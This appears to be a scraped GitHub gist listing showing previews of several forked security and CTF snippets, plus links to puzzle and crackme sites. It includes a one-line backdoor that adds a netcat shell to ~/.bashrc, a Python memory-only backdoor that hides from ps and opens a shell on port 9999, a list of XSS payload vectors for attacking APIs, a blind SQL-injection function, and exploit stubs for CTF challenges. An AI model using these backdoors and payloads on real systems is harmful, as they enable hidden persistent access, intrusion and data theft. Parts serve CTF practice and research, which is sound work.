- [+Ma's Reversing] (http://3564020356.org/)
- [2enigmatik4u] (http://2e4u.net/)
- [Amnesya.com] (http://www.amnesya.com/riddles/howtoplay.htm)
- [Brain Bashers] (http://www.brainbashers.com/)
- [Brain Den] (http://brainden.com/)
- [Braingle] (http://braingle.com/)
- [College Puzzle Challenge] (https://www.collegepuzzlechallenge.com/)
- [Crackmes.de] (http://crackmes.de/)
- [E.B.O.N.Y.] (http://ebony.extra.hu/index.html)
- [Electrica] (http://www.caesum.com/game/index.php)
spnow
/ watchbackdoor.sh
Created
January 3, 2017 13:58
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo watch -n5 "/bin/nc.traditional 127.0.0.1 8082 -e /bin/bash" >> ~/.bashrc |
spnow
/ pypest.py
Created
January 3, 2017 13:59
— forked from toufik-airane/pypest.py
Hackish one-liner memory-only backdoor agent which hides from ps
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # This script prints a simple one-liner memory-only backdoor agent which hides from ps. | |
| # It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite | |
| # and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the | |
| # process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre) | |
| template = """ | |
| import sys,re,pty,os,socket |
spnow
/ 666_lines_of_XSS_vectors.html
Created
January 3, 2017 14:00
— forked from toufik-airane/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API
copied from http://pastebin.com/48WdZR6L
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script\x20type="text/javascript">javascript:alert(1);</script> | |
| <script\x3Etype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Dtype="text/javascript">javascript:alert(1);</script> | |
| <script\x09type="text/javascript">javascript:alert(1);</script> | |
| <script\x0Ctype="text/javascript">javascript:alert(1);</script> | |
| <script\x2Ftype="text/javascript">javascript:alert(1);</script> | |
| <script\x0Atype="text/javascript">javascript:alert(1);</script> | |
| '`"><\x3Cscript>javascript:alert(1)</script> | |
| '`"><\x00script>javascript:alert(1)</script> | |
| <img src=1 href=1 onerror="javascript:alert(1)"></img> |
spnow
/ XORStrings.c
Created
January 3, 2017 14:08
— forked from toufik-airane/XORStrings.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| 2013/03/08 | |
| XORStrings V0.0.1, look for XOR, ROL or SHIFT encoded strings in a file | |
| Source code put in public domain by Didier Stevens, no Copyright | |
| https://DidierStevens.com | |
| Use at your own risk | |
| Shortcommings, or todo's ;-) | |
| - file must fit in memory | |
| - unicode support |
spnow
/ rev150.gdb
Created
January 3, 2017 14:14
— forked from toufik-airane/rev150.gdb
Breizh CTF 2015
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # BreizhCTF2015 Reverse me ! (150pts) Solution | |
| shell python -c "print'a'*42" > /tmp/in | |
| # cmp dl, al | |
| b*0x080485c7 | |
| command | |
| set $eax=$edx | |
| append value /tmp/flag.log $eax | |
| c | |
| end | |
| r < /tmp/in |
spnow
/ iptables_mysql.py
Created
January 5, 2017 01:11
— forked from songmw90/iptables_mysql.py
Monitor mysql-error.log / added iptables to block ip
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf8 -*- | |
| import re | |
| from subprocess import call | |
| path = "/var/log/mysql/" | |
| log = "error.log" | |
| logContents = "" |
spnow
/ find.c
Created
January 9, 2017 13:57
— forked from cvonkleist/find.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <sys/types.h> | |
| #include <sys/stat.h> | |
| #include <fcntl.h> | |
| #include <unistd.h> | |
| #include <openssl/evp.h> | |
| // compile with: gcc -lssl find.c |
spnow
/ Challenges.md
Created
January 9, 2017 14:03
— forked from yunga/Challenges.md
Puzzles, Riddles, Crackme, Programming Challenges...
spnow
/ rubiya.js
Created
March 4, 2017 18:08
— forked from anonymous/rubiya.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function pwn(params){ | |
| var http = new XMLHttpRequest(); | |
| var url = "/game/stats.php?action=psolve"; | |
| http.open("POST", url, false); | |
| http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); | |
| http.send("action=showpsolve&problem_no="+params+"-- -"); | |
| if(http.response.indexOf("you wanna be first") == -1){ return true; } | |
| else return false; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #ABDELJALIL NOUIRI | |
| #author : [email protected] | |
| from pwn import * | |
| HOST = 'chall.pwnable.tw' | |
| PORT = 10000 |